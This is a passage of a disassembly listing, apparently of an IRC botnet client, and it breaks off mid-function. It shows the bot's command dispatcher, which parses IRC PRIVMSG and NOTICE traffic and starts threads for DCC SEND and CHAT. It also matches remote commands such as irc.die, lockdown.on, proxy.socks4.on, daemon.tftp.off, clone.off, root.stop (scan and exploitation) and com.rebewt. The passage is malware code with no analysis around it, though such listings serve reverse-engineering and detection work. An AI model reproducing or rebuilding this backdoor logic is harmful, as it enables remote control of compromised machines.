mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40F26A: ; CODE XREF: sub_40EE72+44A�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F2B7
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40F2B7
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_4179C0
push [ebp+arg_1C]
push edi
call sub_4179D0
add esp, 10h
mov edi, 80h
loc_40F2B7: ; CODE XREF: sub_40EE72+409�j
; sub_40EE72+420�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40F26A
lea eax, [ebp+var_D8]
test eax, eax
jz loc_40F239
cmp [ebp+arg_24], ebx
jz loc_40F239
push [ebp+arg_10]
lea eax, [ebp+var_D8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F2FF
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_418C10
add esp, 0Ch
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F2FF: ; CODE XREF: sub_40EE72+476�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40F304: ; CODE XREF: sub_40EE72+4B3�j
cmp [edi], bl
jz short loc_40F31B
lea eax, [ebp+var_AA8]
push eax
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F32C
loc_40F31B: ; CODE XREF: sub_40EE72+494�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40F304
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F32C: ; CODE XREF: sub_40EE72+4A7�j
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_40F239
push eax
call sub_417AB0
push [ebp+arg_24]
mov edi, eax
call sub_417AB0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_40F239
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_4172AE
push ebx
lea eax, [ebp+var_4C0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40D679
add esp, 24h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F397: ; CODE XREF: sub_40EE72+3DE�j
push esi
push offset aPart ; "PART"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F3B9
push esi
push offset aQuit ; "QUIT"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3E0
loc_40F3B9: ; CODE XREF: sub_40EE72+534�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40F3BE: ; CODE XREF: sub_40EE72+56C�j
cmp [edi], bl
jz short loc_40F3D4
push [ebp+var_94]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F42E
loc_40F3D4: ; CODE XREF: sub_40EE72+54E�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40F3BE
loc_40F3E0: ; CODE XREF: sub_40EE72+545�j
push [ebp+var_90]
push offset a353 ; "353"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F48F
push [ebp+var_84]
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F417
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40F417: ; CODE XREF: sub_40EE72+59A�j
push [ebp+var_84]
push offset dword_4386DC
loc_40F422: ; CODE XREF: sub_40EE72+5B45�j
; sub_40EE72+5E94�j ...
call sub_40BFE1
pop ecx
loc_40F428: ; CODE XREF: sub_40EE72+5FA9�j
pop ecx
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F42E: ; CODE XREF: sub_40EE72+560�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_4386AC
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
push [ebp+var_90]
push offset aPart ; "PART"
call sub_4176D0
add esp, 18h
test eax, eax
jnz loc_40F239
lea eax, [ebp+var_2DC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_40F22E
; ---------------------------------------------------------------------------
loc_40F48F: ; CODE XREF: sub_40EE72+582�j
push [ebp+var_90]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_4176D0
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40F4E3
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F4E3
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F45
cmp ds:dword_42F5B8, ebx
jz loc_414F45
loc_40F4E3: ; CODE XREF: sub_40EE72+637�j
; sub_40EE72+649�j
push [ebp+var_90]
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F66F
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F66F
mov eax, [ebp+var_88]
inc [ebp+var_84]
push 4
mov [ebp+var_8C], eax
pop esi
mov [ebp+var_C0], esi
loc_40F52A: ; CODE XREF: sub_40EE72+8B9�j
; sub_40EE72+94D�j ...
shl esi, 2
mov eax, [ebp+esi+var_94]
lea edi, [ebp+esi+var_94]
push eax
push offset dword_4386A0
mov [ebp+arg_8], eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F96F
push [ebp+esi+var_90]
push offset aSend_0 ; "SEND"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F82A
cmp [ebp+var_AC], ebx
jz loc_40F800
push [ebp+esi+var_8C]
mov edi, offset aS_3 ; "%s"
lea eax, [ebp+var_6F4]
push edi
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_708]
push [ebp+esi+var_88]
push edi
push eax
call sub_4172AE
push [ebp+esi+var_84]
call sub_41781F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_43865C
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416D5A
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C8B4
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz loc_40F7EF
loc_40F659: ; CODE XREF: sub_40EE72+7FB�j
cmp [ebp+var_560], ebx
jnz loc_40F822
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_40F659
; ---------------------------------------------------------------------------
loc_40F66F: ; CODE XREF: sub_40EE72+681�j
; sub_40EE72+697�j
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F688
mov [ebp+var_4], 1
loc_40F688: ; CODE XREF: sub_40EE72+80D�j
cmp [ebp+var_8C], ebx
jz loc_40F239
push (offset loc_4289A7+1)
push [ebp+var_8C]
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40F6AF
cmp [ebp+var_4], ebx
jz short loc_40F6BB
loc_40F6AF: ; CODE XREF: sub_40EE72+836�j
lea eax, [ebp+var_D8]
mov [ebp+var_8C], eax
loc_40F6BB: ; CODE XREF: sub_40EE72+83B�j
cmp [ebp+var_88], ebx
jz loc_40F239
inc [ebp+var_88]
jz short loc_40F707
cmp [ebp+arg_10], ebx
jz short loc_40F707
lea eax, [ebp+var_928]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_928]
push [ebp+var_88]
push eax
call sub_418DA0
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_C0], esi
jmp short loc_40F70D
; ---------------------------------------------------------------------------
loc_40F707: ; CODE XREF: sub_40EE72+85B�j
; sub_40EE72+860�j
mov esi, [ebp+var_C0]
loc_40F70D: ; CODE XREF: sub_40EE72+893�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_40F239
push edi
push offset dword_438650
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F52A
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_40F7B0
mov eax, ds:dword_489DD0
mov eax, ds:off_42F6CC[eax*4]
cmp [eax], bl
jz short loc_40F7B0
push eax
push ecx
push offset dword_438634
push [ebp+arg_4]
call sub_40D633
add esp, 10h
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset aSHasJustVersio ; "%s has just versioned me."
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add esp, 10h
cmp [ebp+var_AC], ebx
jnz loc_40F239
push ebx
lea eax, [ebp+var_2DC]
push 1
push eax
push offset dword_489CDC
loc_40F7A0: ; CODE XREF: sub_40EE72+58BF�j
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F7B0: ; CODE XREF: sub_40EE72+8C8�j
; sub_40EE72+8D8�j
push edi
push offset dword_438610
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F52A
mov eax, [ebp+esi*4+var_90]
cmp eax, ebx
jz loc_40F52A
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz loc_40F52A
push eax
push ecx
push offset dword_4385F8
jmp loc_40F22E
; ---------------------------------------------------------------------------
loc_40F7EF: ; CODE XREF: sub_40EE72+7E1�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4385B0
jmp loc_40F95B
; ---------------------------------------------------------------------------
loc_40F800: ; CODE XREF: sub_40EE72+702�j
lea eax, [ebp+var_D8]
push eax
push [ebp+esi+var_8C]
push offset dword_438560
loc_40F813: ; CODE XREF: sub_40EE72+6175�j
; sub_40EE72+61DC�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 10h
loc_40F822: ; CODE XREF: sub_40EE72+7ED�j
; sub_40EE72+AB1�j ...
push 1
pop esi
jmp loc_411100
; ---------------------------------------------------------------------------
loc_40F82A: ; CODE XREF: sub_40EE72+6F6�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F985
cmp [ebp+var_AC], ebx
jz loc_40F94F
push 13h
call sub_416FA2
test eax, eax
pop ecx
jnz loc_40F941
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset aS_3 ; "%s"
push eax
call sub_4172AE
push [ebp+esi+var_84]
call sub_41781F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_438528
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 13h
push eax
call sub_416D5A
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C351
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_40F933
loc_40F91D: ; CODE XREF: sub_40EE72+ABF�j
cmp [ebp+var_560], ebx
jnz loc_40F822
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_40F91D
; ---------------------------------------------------------------------------
loc_40F933: ; CODE XREF: sub_40EE72+AA9�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4384E4
jmp short loc_40F95B
; ---------------------------------------------------------------------------
loc_40F941: ; CODE XREF: sub_40EE72+9E9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_4384A4
jmp short loc_40F95B
; ---------------------------------------------------------------------------
loc_40F94F: ; CODE XREF: sub_40EE72+9D9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_438464
loc_40F95B: ; CODE XREF: sub_40EE72+989�j
; sub_40EE72+ACD�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_40F96F: ; CODE XREF: sub_40EE72+6DB�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, ds:byte_42F5C4
mov [edi], ecx
jnz loc_40F239
loc_40F985: ; CODE XREF: sub_40EE72+9CD�j
mov edi, [edi]
mov [ebp+arg_8], edi
push edi
mov edi, offset aC_1 ; "c"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414F4D
push [ebp+arg_8]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414F4D
cmp [ebp+var_AC], ebx
jnz short loc_40F9D5
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F45
loc_40F9D5: ; CODE XREF: sub_40EE72+B47�j
cmp [ebp+arg_28], ebx
jnz loc_414F45
xor edi, edi
cmp ds:dword_4313B4, ebx
jle loc_40FB81
mov [ebp+arg_20], offset dword_444340
loc_40F9F3: ; CODE XREF: sub_40EE72+BA0�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FA19
add [ebp+arg_20], 0B8h
inc edi
cmp edi, ds:dword_4313B4
jl short loc_40F9F3
jmp loc_40FB81
; ---------------------------------------------------------------------------
loc_40FA19: ; CODE XREF: sub_40EE72+B90�j
push offset asc_4387B8 ; " :"
push [ebp+arg_0]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_40F239
mov cl, ds:byte_42F5C4
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_42F5C4
mov [eax+3], cl
lea ecx, dword_444358[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_418C10
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40FA6E: ; CODE XREF: sub_40EE72+CA4�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d-"
push eax
call sub_4172AE
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417880
add esp, 14h
test eax, eax
jz short loc_40FADA
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_40FADA
lea eax, dword_444340[edi]
push eax
call sub_417AB0
add [ebp+var_C], eax
pop ecx
jz short loc_40FB0C
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40FB0C
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 0Ch
jmp short loc_40FB0C
; ---------------------------------------------------------------------------
loc_40FADA: ; CODE XREF: sub_40EE72+C24�j
; sub_40EE72+C2B�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_40FB0C
lea eax, [ebp+var_B8]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_418C10
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 18h
loc_40FB0C: ; CODE XREF: sub_40EE72+C3D�j
; sub_40EE72+C51�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40FA6E
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_40FB29: ; CODE XREF: sub_40EE72+D03�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD ; "$%d"
push eax
call sub_4172AE
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417880
add esp, 14h
test eax, eax
jz short loc_40FB6C
mov eax, [edi]
cmp eax, ebx
jz short loc_40FB6C
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 0Ch
loc_40FB6C: ; CODE XREF: sub_40EE72+CDF�j
; sub_40EE72+CE5�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_40FB29
mov [ebp+var_DC], 1
loc_40FB81: ; CODE XREF: sub_40EE72+B74�j
; sub_40EE72+BA2�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, ds:byte_42F5C4
jz short loc_40FB9A
cmp [ebp+var_DC], ebx
jz loc_40FD7F
loc_40FB9A: ; CODE XREF: sub_40EE72+D1A�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe_0 ; "$me"
push edi
call sub_40A7D7
lea eax, [ebp+var_D8]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40A7D7
push [ebp+var_8C]
push offset aChan ; "$chan"
push edi
call sub_40A7D7
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_415CFF
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_40A7D7
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40A7D7
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_417880
add esp, 14h
loc_40FC0C: ; CODE XREF: sub_40EE72+E86�j
test eax, eax
jz loc_40FCFD
push edi
push [ebp+arg_0]
call sub_417880
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_418C10
lea eax, [ebp+var_B8]
push offset asc_438420 ; ")"
push eax
call sub_418B6E
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_40FC58
cmp [ebp+var_B8], 39h
jle short loc_40FC6E
loc_40FC58: ; CODE XREF: sub_40EE72+DDB�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_418C10
add esp, 0Ch
loc_40FC6E: ; CODE XREF: sub_40EE72+DE4�j
lea eax, [ebp+var_B8]
push eax
call sub_41781F
test eax, eax
pop ecx
jle short loc_40FC91
lea eax, [ebp+var_B8]
push eax
call sub_41781F
pop ecx
mov [ebp+var_14], al
jmp short loc_40FCA2
; ---------------------------------------------------------------------------
loc_40FC91: ; CODE XREF: sub_40EE72+E0B�j
call sub_41730A
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_40FCA2: ; CODE XREF: sub_40EE72+E1D�j
lea eax, [ebp+var_B8]
mov [ebp+var_13], bl
push eax
call sub_417AB0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_417330
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B8]
push [ebp+arg_10]
push eax
call sub_418C10
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
push edi
push [ebp+arg_0]
call sub_417880
add esp, 30h
jmp loc_40FC0C
; ---------------------------------------------------------------------------
loc_40FCFD: ; CODE XREF: sub_40EE72+D9C�j
mov edi, 1FFh
lea eax, [ebp+var_FB0]
push edi
push [ebp+arg_0]
push eax
call sub_418C10
lea eax, [ebp+var_FB0]
push edi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_418C10
lea eax, [ebp+var_11B0]
push offset asc_42A3B4 ; " "
push eax
call sub_418B6E
add esp, 20h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+arg_10], 1Fh
loc_40FD4D: ; CODE XREF: sub_40EE72+EF0�j
push offset asc_42A3B4 ; " "
push ebx
call sub_418B6E
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40FD4D
mov ecx, [ebp+esi+var_94]
lea eax, [ebp+esi+var_94]
cmp ecx, ebx
jz loc_40F239
add ecx, 3
mov [eax], ecx
loc_40FD7F: ; CODE XREF: sub_40EE72+D22�j
mov edi, [ebp+esi+var_94]
push edi
push offset aIrc_rndnick ; "irc.rndnick"
mov [ebp+arg_8], edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414EF3
push edi
push offset aRn ; "rn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414EF3
push edi
push offset aIrc_die ; "irc.die"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ED1
push edi
push offset aIrc_di ; "irc.di"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ED1
push edi
push offset aIrc_logout ; "irc.logout"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E2F
push edi
push offset aLo ; "lo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E2F
push edi
push offset aIrc_version ; "irc.version"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E20
push edi
push offset aVer ; "ver"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E20
push edi
push offset aLockdown_on ; "lockdown.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0B
push edi
push offset aLd_on ; "ld.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0B
push edi
push offset aLockdown_off ; "lockdown.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0B
push edi
push offset aLd_off ; "ld.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0B
push edi
push offset aProxy_socks4_o ; "proxy.socks4.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BE9
push edi
push offset aProxy_s4_on ; "proxy.s4.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BE9
push edi
push offset aProxy_socks4_0 ; "proxy.socks4.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FEEF
push [ebp+esi+var_90]
push 11h
push offset aServer ; "Server"
push offset dword_438368
loc_40FED3: ; CODE XREF: sub_40EE72+10A1�j
; sub_40EE72+10C7�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_416FE8
add esp, 20h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40FEEF: ; CODE XREF: sub_40EE72+104C�j
push edi
push offset aDaemon_rlogin_ ; "daemon.rlogin.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF15
push [ebp+esi+var_90]
push 6
push offset aServer ; "Server"
push offset dword_438344
jmp short loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF15: ; CODE XREF: sub_40EE72+108C�j
push edi
push offset dword_438334
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF3B
push [ebp+esi+var_90]
push 3
push offset aServer ; "Server"
push offset dword_438328
jmp short loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF3B: ; CODE XREF: sub_40EE72+10B2�j
push edi
push offset dword_438320
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF64
push [ebp+esi+var_90]
push 1Dh
push offset dword_438314
push offset dword_438308
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF64: ; CODE XREF: sub_40EE72+10D8�j
push edi
push offset aProxy_redirect ; "proxy.redirect.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF8D
push [ebp+esi+var_90]
push 10h
push offset dword_4382E4
push offset dword_4382D4
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF8D: ; CODE XREF: sub_40EE72+1101�j
push edi
push offset dword_4382C8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FFB6
push [ebp+esi+var_90]
push 0Ah
push offset dword_4382BC
push offset dword_4382B0
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FFB6: ; CODE XREF: sub_40EE72+112A�j
push edi
push offset dword_4382A0
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FFDF
push [ebp+esi+var_90]
push 0Bh
push offset dword_438294
push offset dword_438288
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FFDF: ; CODE XREF: sub_40EE72+1153�j
push edi
push offset dword_438278
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410008
push [ebp+esi+var_90]
push 0Fh
push offset dword_43826C
push offset dword_438260
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410008: ; CODE XREF: sub_40EE72+117C�j
push edi
push offset dword_438250
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410031
push [ebp+esi+var_90]
push 0Eh
push offset dword_438244
push offset dword_438238
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410031: ; CODE XREF: sub_40EE72+11A5�j
push edi
push offset aDaemon_tftp_of ; "daemon.tftp.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41005A
push [ebp+esi+var_90]
push 4
push offset aServer ; "Server"
push offset dword_43821C
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_41005A: ; CODE XREF: sub_40EE72+11CE�j
push edi
push offset aUtil_findfile_ ; "util.findfile.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD1
push edi
push offset aUtil_ff_off ; "util.ff.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD1
push edi
push offset aCom_procs_off ; "com.procs.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BB9
push edi
push offset aCom_ps_off ; "com.ps.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BB9
push edi
push offset aClone_off ; "clone.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4100D7
push [ebp+esi+var_90]
push 18h
push offset aClone ; "Clone"
push offset dword_4381BC
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_4100D7: ; CODE XREF: sub_40EE72+124B�j
push edi
push offset aLockdown_stop ; "lockdown.stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410100
push [ebp+esi+var_90]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset dword_438194
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410100: ; CODE XREF: sub_40EE72+1274�j
push edi
push offset aRoot_stop ; "root.stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410129
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aExploitation ; "Exploitation"
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410129: ; CODE XREF: sub_40EE72+129D�j
push edi
push offset aRoot_stats ; "root.stats"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BA3
push edi
push offset aRoot_st ; "root.st"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BA3
push edi
push offset aIrc_reconnect ; "irc.reconnect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B82
push edi
push offset aIrc_r ; "irc.r"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B82
push edi
push offset aIrc_disconnect ; "irc.disconnect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B60
push edi
push offset aIrc_d ; "irc.d"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B60
push edi
push offset aIrc_quit ; "irc.quit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B18
push edi
push offset aIrc_q ; "irc.q"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B18
push edi
push offset aIrc_status ; "irc.status"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414AD9
push edi
push offset aIrc_s ; "irc.s"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414AD9
push edi
push offset aIrc_id ; "irc.id"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ACD
push edi
push offset aIrc_i ; "irc.i"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ACD
push edi
push offset aCom_rebewt ; "com.rebewt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410277
call sub_40AC20
test eax, eax
mov eax, offset dword_4380BC
jnz short loc_410249
mov eax, offset dword_438088
loc_410249: ; CODE XREF: sub_40EE72+13D0�j
push eax
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 1Ch
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_410277: ; CODE XREF: sub_40EE72+13C2�j
push edi
push offset aThreads_list ; "threads.list"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149DC
push edi
push offset aThreads_l ; "threads.l"
call sub_4176D0
pop ecx
